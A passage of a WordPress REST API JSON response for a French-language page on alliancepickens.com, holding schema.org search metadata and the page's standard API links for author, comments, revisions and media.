County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=8689"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8689\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=8689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}